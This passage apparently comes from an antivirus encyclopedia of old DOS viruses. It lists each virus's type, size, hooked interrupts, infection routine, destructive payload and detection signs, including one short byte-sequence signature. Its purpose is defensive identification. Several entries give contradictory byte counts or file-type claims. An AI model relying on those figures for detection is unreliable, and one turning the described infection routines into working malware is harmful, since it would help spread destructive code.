another uninfected .COM file. It only infects one file at a time. Then it executes the original file. b) Creates a file name "ICONKIN.COM" in the current directory, then it executes the file. When the file is executed, a window appears on the screen until you press a key, and after a while the window appears again. Damage: None Detection method: 1) Infected files will increase by 2372 Bytes. 2) Check for a strange window. Note: 1) Doesn't stay resident in memory. 2) INOK-2372 doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Multi-2] Virus Name: Multi-2 Virus Type: Partition Table Infector, File Virus (.COM and .EXE files) Virus Length: Not Applicable PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch, INT 13h Execution Procedure: 1) The virus will decrease the total system memory by 3K Bytes when the system is booted from an infected disk. 2) It then checks whether it is loaded resident in memory; if "No", then it will load resident to the last 3K bytes of memory by hooking INT 21h and INT 1Ch. 3) It infects files when they are executed. Damage: None Detection method: Infected files increase by 927-1000 Bytes. Note: Multi-2 hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [BFD] Virus Name: BFD Virus Type: Boot Virus, File Virus Virus Length: No change PC Vectors Hooked: INT 13h, INT 24h Execution Procedure: 1) The virus decreases the total system memory by 2K Bytes when the system is booted from an infected disk. 2) It loads itself resident in the last 4K Bytes of memory. 3) It hooks INT 13h. 4) When you turn on the computer the resident memory virus infects the boot sector and files when reading and writing uninfected disks or programs. Damage: Overwrites original files, so the length of infected files won't increase. Detection method: None Note: 1) BFD hooks INT 24h when infecting files or the boot sector. It omits I/O errors (such as write protect). [BFD-B] Virus Name: BFD-B Virus Type: File Virus, Boot Sector Infector (Multi-partite Virus) Virus Length: No change PC Vectors Hooked: INT 13h, INT 24h Execution Procedure: 1) When you execute the file, it will check whether the boot sector of the hard disk has been infected; if "No", it will infect the boot sector. 2) It then checks whether it has loaded itself resident in memory; if "No", then it loads itself resident in memory by hooking INT 21h and INT 13h. After the virus has loaded itself resident in memory it will infect boot sectors and files while reading and writing uninfected disks or programs. Damage: Overwrites original files, so the length of infected files won't increase. Detection method: None Note: 1) BFD hooks INT 24h when infecting files or boot sectors. It omits I/O errors (such as write protect). [XQR] Virus Name: XQR Virus Type: Partition table Infector, File Virus Virus Length: Not Applicable PC Vectors Hooked: INT 21h, INT 24h, INT 13h, INT 8h Execution Procedure: 1) The virus decreases the total system memory by 4K Bytes when the system is booted from an infected disk. 2) The virus loads itself resident into the last 4K Bytes of memory. 3) It then hooks INT 13h. 4) When the computer is turned on normally the virus will check whether the system date is May 4; if "Yes", a message will appear on the screen: " XQR: Wherever, I love you Forever and ever! The beautiful memory for ours in that summer time has been recorded in Computer history . Bon voyage, my dear XQR! " 5) It continues to infect any executed program. Damage: When it is Sunday, the virus will change the keyboard settings. Detection method: Check the keyboard functionality. Note: XQR hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Bogus] Virus Name: BOGUS Virus Type: Partition table Infector, File Infector Virus Virus Length: No change PC Vectors Hooked: INT 21h, INT 24h, INT 13h Execution Procedure: 1) The virus decreases the total system memory by 4K Bytes when the system is booted from an infected disk. 2) The virus loads itself resident into the last 4K Bytes of memory. 3) It then hooks INT 13h. 4) It continues to infect any executed program. Damage: When the number of infected files is larger than 2710, then it destroys all data on the hard disk. Detection method: Check whether the file head is INT 13h (AX=90 or 91). Note: 1) BOGUS hooks INT 24h when infecting files. It omits I/O errors (such as write protect). 2) If the computer is booted from a diskette, you will not be able to view the hard drive. [Invol-1] Virus Name: INVOL-1 Virus Type: EXE and SYS and File Infector Virus Virus Length: 1350/60 Bytes (EXE), 2720 Bytes (SYS) PC Vectors Hooked: INT 21h Execution Procedure: EXE File: 1) The virus searches for the first command of C:\CONFIG.SYS; if the command is *.*=xxxx.yyy the virus will infect the file. 2) Then it finishes executing the original file. 3) The file infects when an uninfected program is executed. SYS File: 1) Hooks INT 21h and loads itself resident in memory. 2) Executes the original file. Damage: Checks whether it is 20th of the month; if "Yes", then it destroys all hard disk data. Detection method: Infected .EXE files increase by 1350 Bytes, SYS files increase by 2720 Bytes. Note: 1) INVOL-1 doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [August16] Virus Name: August16 Other names: Iron maiden Virus Type: Parasitic Virus (infects .COM files) Virus Length: 636 Bytes PC Vectors Hooked: Int 21 Execution Procedure: 1) The virus checks whether the first two .COM files in the current directory have been infected. 2) If "No" it will proceed to infect them. 3) If "Yes" it checks the current directory on the C:\ drive to see whether it has two .COM files. 4) If "Yes" it will proceed to infect them. 5) Then the original file is executed. Damage: 1) August16 overwrites the original file to hide changes to the file's date and time in the directory listing. 2) Adds two text strings to infected files: "*.COM AA", "=!=IRON MAIDEN." Detection method: 1) .COM file growth. 2) Unexpected access to the C:\ drive. Note: August16 doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [BkMonday] Virus Name: BKMonday Other names: Virus 1055 Virus Type: File Virus Virus Length: 1055 bytes PC Vectors Hooked: Int 21 Damage: Formats first 240 cylinders of the first hard drive. Detection method: Overwrites the original file in order to hide changes to the file after infection. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Devil's_Dance] Virus Name: Devil's_Dance Other names: Virus 941 Virus Type: File Virus Virus Length: 941 bytes PC Vectors Hooked: Int 21 Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: The Devil's_Dance virus monitors Int 9 (keyboard). A routine for cursor manipulation is activated when 5 keys other than the Alt key have been depressed. Furthermore, if the Alt key is not depressed, attributes of the cursor in Video-RAM are changed after any other key is pressed. The new attributes are as follows: 09h (bright blue), 0ah (bright green), obh (bright cyan), 0ch (bright red), 0dh (bright violet), oeh (bright yellow). If the above five keys are not pressed, the virus will not manifest itself. If Del is depressed, the virus will display characters using the color white. The virus displays the following message: "Have you ever danced with the devil under the weak light of the moon?.... Pray for your disk...The Joker HAHAHAHAHAHA HAHAHAHA." The virus will finally test whether any keys were pressed 2500 times. If yes, the virus overwrites the Disk Partition Table of the first hard disk and proceeds to crash the system. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Hero-394] Virus Name: HERO-394 Other names: None Virus Type: File Virus Virus Length: Increases infected EXE file size by 394 bytes. Damage: None Detection method: The virus will check the system date. If it is the first day of the month, a confusing code will be displayed on the screen. [NOPX_2.1] Virus Name: NOPX_2.1 Other names: None Virus Type: File Virus Virus Length: Increases infected .EXE file size by 1686 bytes, also .COM file. PC Vectors Hooked: Int 21 Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: The virus has bugs in itself (Error in calculating entry point). So some infected EXE files can't be executed correctly. Detection method: Increase in infected file size by 1686 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [NCU_LI] Virus Name: NCU_Li Other names: None Virus Type: File Virus Virus Length: 1690/1670 bytes PC Vectors Hooked: Int 21 Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Increase infected files size by 1690/1670 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Ghost-A] Virus Name: GHOST-A Other names: None Virus Type: File Virus Virus Length: 330 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: The executed file will be deleted after the virus has resided in the memory and the system date is Friday. Virus then halts the system. Detection method: Increase in infected file size by 330 bytes. Note: 1) Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [VVF34] Virus Name: VVF34 Other names: None Virus Type: File Virus Virus Length: 1614-1624 bytes (EXE), 1614 bytes (COM) Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: The virus hooks 1Ch. After the virus has resided in memory for 5 minutes and 15 files have already been infected, the virus will proceed to draw a portrait in the center of the screen. The virus will also hook interrupt 9h (keyboard interrupt). The virus will then display the following message when the user presses any key: "Bu, Bu, Bu..." Detection method: Increases infected file size by 1614/1624 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Damage-B] Virus Name: DAMAGE-B Other names: None Virus Type: Parasitic Virus Virus Length: 1110 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: Virus checks the system date. If it is Tuesday, it will format the hard disk. Detection method: Increases infected file size by 1110 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Fam1] Virus Name: FAM1 Other names: None Virus Type: File Virus Virus Length: 1063 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Increases infected file size by 1036 bytes. This only occurs with a MONO display card. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Malaise] Virus Name: MALAISE Other names: None Virus Type: File Virus Virus Length: 1335/1365 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Increases infected files size by 1335-1365 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Walker] Virus Name: WALKER Other names: None Virus Type: File Virus Virus Length: 3845 bytes (EXE), 3852 bytes (COM) Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Interrupt 16 will be hooked. A man walking across the screen for the duration of 14 seconds will occasionally be displayed. Increases infected file size by 3845/3852 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Proto-T] Virus Name: PROTO-T Other names: None Virus Type: File Virus Virus Length: 695 bytes (COM) Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Increases infected files size by 695 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [QMU] Virus Name: QMU Other names: None Virus Type: Multi-partite Virus Virus Length: 1513 bytes (COM) Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: Hard disk cannot be booted after the virus internal counter reaches 100. Detection method: Increases infected file size by 1513 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [492] Virus Name: 492 Other names: None Virus Type: File Virus Virus Length: 492 bytes (COM) Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: Virus will check the system date. If it is the 14th day of the month and it is a Saturday, the virus will erase all data on the hard disk. Detection method: Increases infected file size by 492 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Reaper] Virus Name: REAPER Other names: None Virus Type: File Virus Virus Length: 1072 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: The Reaper virus will check the system date after it resides in memory. If it is Aug 21, the virus will display the following message: "Reaper Man. (c) 92, Apache Warrior, ARCV Pres." Detection method: Increases infected file size by 1072 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Jump4Joy] Virus Name: JUMP4JOY Other names: None Virus Type: File Virus Virus Length: 1273 bytes (COM) Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Increases infected file size by 1273 bytes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Aragorn] Virus Name: ARAGORN Other names: None Virus Type: Boot Strap Sector Virus Damage: None Infection method: Only floppy diskette in drive A will be infected. [Trash] Virus Name: TRASH Other names: None Virus Type: Boot Strap Sector Virus Virus Length: 1241 bytes Damage: Virus will overwrite the Partition Table. Detection method: Virus will not infect any files. Virus will display the following message: "Warning!!! This program will zero (DESTROY) the master boot record of your first hard disk. The purpose of this is to test the anti-virus software, so be sure you have installed your favorite protecting program before running this one! It is almost certain that it will fail to protect you anyway. Press any key to abort, or press Ctrl-Alt-Right Shift- F5 to proceed at your own risk." Virus will proceed to overwrite the Partition Table if user presses Ctrl-Alt-Right Shift-F5. [Data Crime] Virus Name: Datacrime Other names: 1168, Columbus Day Virus Type: File Virus Virus Length: 1168 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: Virus will low-level format your hard disk after October 12. Detection method: Virus infects all .COM files between April 1st-October 12th. After October 12th, it will display the following message: "DATACRIME VIRUS Released:1 March 1989." It will then low-level format your hard disk. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Datacrime II] Virus Name: Datacrime II Other names: None Virus Type: File Virus Virus Length: Increases .COM and .EXE files by 1514 bytes. Damage: Virus will low-level format cylinder 0 of your hard disk after October 12. Detection method: Between October 12th-31st, excluding Mondays, the virus will display the following message: "DATACRIME-2 VIRUS." The virus will proceed to low-level format cylinder 0 of the hard disk. Then the system will hang. [Marauder] Virus Name: Marauder Other names: None Virus Type: File Virus Virus Length: Increases .COM file by 860 bytes. Execution Procedure: 1) The virus searches the current directory for a .COM file. Once it locates a file it checks whether it is already infected by the Marauder virus. If "No", it then infects the file. 2) If "Yes" then it searches for another .COM file to infect. b) It doesn't infect .EXE files. 3) It then executes the original file. Damage: The Marauder virus will overwrite your files every February 2 with the string "=[Marauder] 1992 Hellraiser -Phalcon/Skism." Detection method: When the infected file is executed, the virus will infect the first uninfected .COM file in the current directory. Every February 2, the virus will overwrite all executed files by following characters one by one "=[Aarauder] 1992 Hellraiser - Phalcon/skism." [Oropax] Virus Name: Oropax Other names: None Virus Type: File Virus Virus Length: 2756-2800 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: Infected .COM file sizes increase by 2756-2800 bytes. Detection method: Virus will hook interrupt 20h, 21h, 27h. If the system date is after May 1, 1987 and it is an IBM-compatible computer, interrupt 8h will be hooked. When the virus is triggered, it will play the "Stars", "Blue" and "Forty" songs one by one every eight minutes. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [dBASE] Virus Name: dBASE Other names: None Virus Type: File Virus Virus Length: 1864 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: Every executed .COM file increases by 1864 bytes. Virus will sometimes cause system to halt. Detection method: Virus will hook interrupt 21h. When the virus is activated, it will switch high-byte and low-byte of every opened .DBF data files. Virus will also create a hidden file - "BUG.DAT" in the root directory of every infected .DBF file name. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Halloween] Virus Name: Halloween Other names: Happy Halloween Virus Type: File Virus Virus Length: N/A Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: Virus finds an executable file (first .EXE file then .COM) in current directory and proceeds to infect it. It will display "Runtime error 002 at 0000:0511" on screen if no uninfected files are found. Detection method: Every Oct 31, the virus will create a 10KB-long file and display "Runtime error 150 at 0000:0AC8." Note: 1) Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Kennedy] Virus Name: Kennedy Other names: None Virus Type: File Virus Virus Length: 333 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: Virus destroys FAT. Detection method: On June 6, November 8, and November 22, the virus will display the following message: "Kennedy is dead - long live the Dead Kennedys." Virus proceeds to destroy FAT. Note: Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Virus-90] Virus Name: Virus-90 Other names: None Virus Type: File Virus Virus Length: 857 bytes (COM) Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: Infected .COM files increase by 857 bytes. Detection method: Virus displays "Infected" when a file gets infected. Note: 1) Loads itself resident in memory. An error message appears if there is an I/O error (such as write protect). [Lehigh] Virus Name: Lehigh Other names: None Virus Type: Parasitic Virus (infects COMMAND.COM only) Virus Length: 555 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) Then when a disk is accessed and if COMMAND.COM is uninfected it will immediately infect it and execute the original file. 3) With itself loaded resident into memory it checks for any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: 1) Infects the disk's COMMAND.COM file and increases its size by 555 bytes. 2) When the infection count is more than four the current disk will be trashed. [Como] Virus Name: Como Virus Type: File Virus Virus Length: 2,020/2,030 bytes (EXE) PC Vectors Hooked: None Execution Procedure: 1) It searches for an EXE file in the current directory. 2) Then it checks if the file has been infected. If Yes", it continues to search. 3) If an uninfected file is found, there is 50% probability for the file to get infected. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. When running an uninfected program, the program will get infected. 2) Before infecting files, the virus displays: "It's your task to find and delete them, best wishes. Press a key to execute the prompt." Damage: None Detection method: Check if the file length increases by 2,020/2,030 bytes. Remarks: 1) Non memory resident. 2) Before infecting files, the virus hooks INT 24h in order to omit the I/O error messages. [512] Virus Name: 512 Virus Type: File Virus Virus Length: 512 bytes Symptoms: None Execution Procedure: Virus does not contain any damage routine, but its spreading mechanism presents a great danger to the infected file. The beginning is saved outside the file in free space in the allocated cluster. When copying such a program, this part is not copied together with the rest of the file, causing the original program to be destroyed. Other manifested problems to files are: when an infected file is read with the virus already in the memory, it tests as a virus flag only the time of the last modification (62 seconds) and not the actual file content. The same virus flag is used by viruses 648 and 1560 and some users have their programs immunized against virus 648. The result is that, the nonsense data which lies at the end of an infected file will be read rather than the actual file content. [744] Virus Name: 744 Virus Type: Parasitic Virus Virus Length: 744 bytes Symptoms: Increases infected file sizes by 744 bytes. Destroyed programs will cause computer to crash in most cases. Damage: With the probability of 1:7 the virus will not infect other files but will destroy the founded file. Virus writes the instruction JMP [BP+0] at the start of program. Virus contains an error. It should write JMP F000:FFF0 instruction (computer reboot - same as virus 648), which is 4 bytes from the actually written instruction. Length of destroyed program is not changed. This program contains a virus flag. Reads and writes using DOS interrupts. When virus finds a program which can be infected, it reads and without any change writes to sector number 1 (FAT area). This is not done on the disk C:. It is done as a test whether the disk is write protected or not. [1800] Virus Name: 1800 Other Names: Bulgarian virus, Sofia virus, Dark Avenger Virus Type: Parasitic Virus Virus Length: cca 1800 bytes Symptoms: Increases infected file sizes by cca 1800 bytes (in the case of EXE files it performs paragraph alignment). Decreases size of free RAM memory. Infected files contain the following strings: "Eddie lives...somewhere in time!", "Diana P." a "This program was written in the city of Sofia (C) 1988-89 Dark Avenger." Damage: Virus reads boot sector of the disk, and in it (offset 10, OEM decimal version) marks the number of programs, which are run from the given disk MOD 16. If it is zero (after every 16 programs!!), it overwrites random cluster on the disk with part of its own code. The cluster number is then stored in the boot sector at the position at offset 8 (OEM main version). Modifies boot sector then writes back on the disk. [V2000] Virus Name: V2000 Other Names: 21 century virus Virus Type: Parasitic Virus Virus Length: 2000 bytes Symptoms: Increases infected .COM and .EXE file sizes by 2000 bytes. Decreases size of free RAM memory by 4KB. Infected files contain the following strings: "(C) 1989 by Vesselin Bontchev" Damage: None [2343] Virus Name: 2343 Other Names: Flip virus Virus Type: Multi-partite Virus Virus Length: 2343 bytes Symptoms: Increases infected .COM and .EXE file sizes by 2343 bytes. Decreases size of free RAM memory with 2864 bytes. New DOS function 0FE01h is implemented, when virus is active in memory, it returns 01FEh in AX. Word 028h in DPT sector contains the value 0FE01h. Flip virus has the same virus flag as the viruses 648, 1560 (ALABAMA) and 512: it sets the number of seconds in the file's time stamp to the nonsense value of 62. Infected files contain the following strings: "OMICRON by PsychoBlast" Damage: Under certain conditions virus "flips" the screen. If the damage routine is active, virus contains bit reversed of screen font 8*14 and monitors the interrupt 10h. When video mode is changed to the mode 2 or 3 the special routine for interrupt 1Ch is activated. All other video modes are interrupt vector 1Ch set to IRET instruction. For video modes 2 and 3, the video start address is set to 1000h. The memory at segment 0BA00h is used as video memory rather than 0B800h. On every call of interrupt 1Ch (18.2 times per second) virus copies 500 words (characters and their attributes) from memory segment 0B800h into memory segment 0BA00h with inversion of rows and columns. [Pojer] Virus Name: Pojer Virus Type: Parasitic Virus Virus Length: Infected EXE and COM files increase by 1919 Bytes PC Vectors Hooked: INT 21h and INT 24h Execution Procedure: 1) Checks whether it already resides in memory. If not, hooks INT 21h and resides in the highest memory, and then executes the host program. 2) If it already resides in the highest memory, the host program will be executed immediately Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. The uninfected files will be infected when they are executed. 2) Before infecting files Pojer will hook INT 24h in order to ignore the I/O errors. Damage: None Detection method: Detectable if the lengths of files increase by 1919 Bytes. [Drop] Virus Name: Drop Virus. Type: Parasitic Virus. Virus Length: Infected EXE file sizes increase by 1130-1155 Bytes and COM files increase by 1131 Bytes. PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it resides in memory or not. If not, hooks INT 21h and resides in the highest memory, and then executes the host program (If it already resides in the highest memory, the host program will be executed directly). 2) Then checks system date. It will hook INT 21h if the date is "the sixth day of the month". The characters on the screen will drop and the system will hang when any program is executed. Infection Procedure: 1) The virus infects files by AH=4B in INT 21h. The non-infected files will be infected when they are executed. 2) Before infecting files Drop will not hook INT 24h. The error information will appear when I/O errors occur. Damage: Refer to Execution Procedure 2). Detection method: Detectable if the lengths of files increase by 1130-1155 Bytes. [Ha] Virus Name: Ha Virus Type: Parasitic Virus Virus Length: Infected EXE file sizes increase by 1458-1468 Bytes and COM files increase by 1462 Bytes. PC Vectors Hooked: INT 21h Execution Procedure: 1) Detects whether it has resided in memory. If not, hooks INT 21h and resides in the highest memory, and then executes the host program. 2) If it has already resided in the highest memory, the program will be executed directly. Infection Procedure: The virus infects files by AH=4B in INT 21h. The uninfected files will be infected when they are executed. Damage: None Detection method: Detectable if the lengths of files increase by 1458-1468 Bytes. [LCT] Virus Name: Lct Virus Type: Parasitic Virus Virus Length: Infected COM file sizes increase by 599 Bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM files in the current directory. 2) The virus checks whether the file is infected or not. If the file has been infected, the virus continues to search until an uninfected file is found and then infects it. The virus stops searching until the last COM file in the current directory is infected. Damage: The virus checks the system date. If the date is "the 25th of Dec.", every time an infected file is executed, only the virus codes in the infected file is executed. The program then ends. The host programs are not executed. Detection method: Detectable if the lengths of files increase by 599 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. And the error information appears when I/O errors occur. [NPOX-Var] Virus Name: Npox-var Virus Type: Parasitic Virus Virus Length: Infected COM file sizes increase by 1000 Bytes PC Vectors Hooked: None Execution Procedure: 1) The virus searches for a COM file in the current directory. 2) The virus checks whether the file is infected. If the file has been infected, the virus continues to search until an uninfected file is found and then infects it. (The virus only infects one file at a time.) Damage: None Detection method: Detectable if the lengths of files increase by 1000 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. And the error information appears when I/O errors occur. 3) The beginning of the virus is: INC BX PUSH AX POP AX DEC BX JMP XXXX [Bur-560h] Virus Name: Bur-560h Virus Type: Parasitic Virus Virus Length: Infected COM files do not increase (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) The virus searches for COM files through the current path. 2) The virus checks whether the file is infected. If the file has been infected, the virus continues to search until an uninfected file is found and then infects it (It only infects one file at a time). Damage: The virus infects the files by covering up the original files, so the lengths of the files do not increase and the functions of the original files can not be executed. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. And the error information appears when I/O errors occur. [Benoit] Virus Name: Benoit Virus Type: Parasitic Virus Virus Length: Infected COM file sizes increase by 1183 bytes (Does not infect EXE files). PC Vectors Hooked: INT 21h Execution Procedure: 1) After entering memory, it checks whether it resides in memory. If not, the virus hooks INT 21h and resides in the high memory and then runs the host program. 2) If the virus already resides in memory, the host programs will be executed directly. Infection Procedure: 1) Infects the file by "AH=4B" in INT 21h. When an uninfected file is executed, it will be infected (Does not infect COM files). 2) When infecting files, the virus does not hook INT 24h. The error information will appear when I/O errors occur. Damage: None Detection method: Detectable when the lengths of files increase by 1183 bytes. [Hallo] Virus Name: Hallo Virus Type: Parasitic Virus Virus Length: Infected COM file sizes increase by 496 Bytes. (Does not infect EXE files.) PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current disk. 2) Checks whether the file is infected. If yes, continues to search until an uninfected file is found and then infects it. (only infects one file at a time). After the file is infected, the virus displays "I have got a virus for you!". Damage: None Detection method: See if the string "I have got a virus for you!" displays when executing programs and if the lengths of files increase by 599 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Allerbmu] Virus Name: Allerbmu Virus Type: Parasitic Virus Virus Length: Infected COM file sizes increase by 359 Bytes. (Does not infect EXE files.) PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether the file is infected. If yes, the virus continues to search. 3) If an uninfected file is found, the virus will proceed to infect it. (The virus only infects one file at a time). 4) Checks the system date no matter whether an uninfected COM file is found or not. When the date is 'Monday', the virus destroys all files on the hard disk, and then displays the following message: "+ ALLERBMU NORI +(c) 1991........................" Damage: Refer to Execution Procedure 4). Detection method: Detectable if the lengths of files increase by 359 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Findm-608] Virus Name: Findm-608 Virus Type: Parasitic Virus Virus Length: Infected COM file sizes increase by 608-623 Bytes. (Does not infect EXE files.) PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether the file is infected. If yes, continues to search until an uninfected file is found. 3) If an uninfected file is found, the virus will proceed to infect it. Damage: None Detection method: Detectable if the lengths of files increase by 608-623 Bytes. Remarks: 1) The part of infection of the virus was badly written. Most of the infected files cannot be executed normally (also the virus is not able to infect and damage). 2) Non memory resident. 3) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [ARCV-2] Virus Name: Arcv-2 Virus Type: Parasitic Virus Virus Length: Infected EXE file sizes increase by 693 Bytes (Does not infect COM files). PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for an EXE file in the current directory. 2) Checks whether the file is infected. If yes, the virus continues to search. 3) If an uninfected file is found, the virus will proceed to infect it (only infects one file at a time). 4) Whether an uninfected EXE file is found or not, the virus will check the system date. When the date is "April" or "the sixth of the month", the virus will display "Help .. Help .. I'm Sinking ........" on the screen. Damage: None Detection method: Detectable if the lengths of files increase by 693 Bytes. Remarks: 1) The part of infection was badly written. Most of the infected files cannot be executed normally (also the virus is not able to infect and damage). 2) Non memory resident. 3) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Hallo-759] Virus Name: Hallo-759 Virus Type: Parasitic Virus Virus Length: Infected COM file sizes increase by 533 bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether the file is infected. If yes, continues to search until an uninfected file is found and then infects it. (only infects one file at a time). After infecting, the virus displays the string: "I have got a virus for you!". Damage: None Detection method: Detectable when the string "I have got a virus for you!" is displayed when executing programs and if the lengths of files increases by 759-775 Bytes. Remarks: 1) The infection part was badly written. After the infected files end, the system will hang. 2) Non memory resident. 3) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Atomic-2A] Virus Name: Atomic-2a Virus Type: Parasitic Virus Virus Length: Infected COM file sizes increase by 350 Bytes (Does not infect EXE files). PC Vectors Hooked: None Execution Procedure: 1) Searches for a COM file in the current directory. 2) Checks whether the file is infected. If yes, continues to search until an uninfected file is found and then infects it. (only infects one file at a time.) Damage: None Detection method: Detectable if the lengths of files increase by 350 Bytes. Remarks: 1) Non memory resident. 2) When infecting files, the virus does not hook INT 24h. Error message will appear when I/O errors occur. [Atomic-1B] Virus Name: Atomic-1b Virus Type: Parasitic Virus Virus Length: The lengths of the infected COM files do not increase (Does not infect EXE files.) PC Vectors Hooked: None Execution Procedure: 1) When the system date is the 1st, the virus will display "The Atomic Dustbin--YOUR PHUCKED!" The system then hangs. 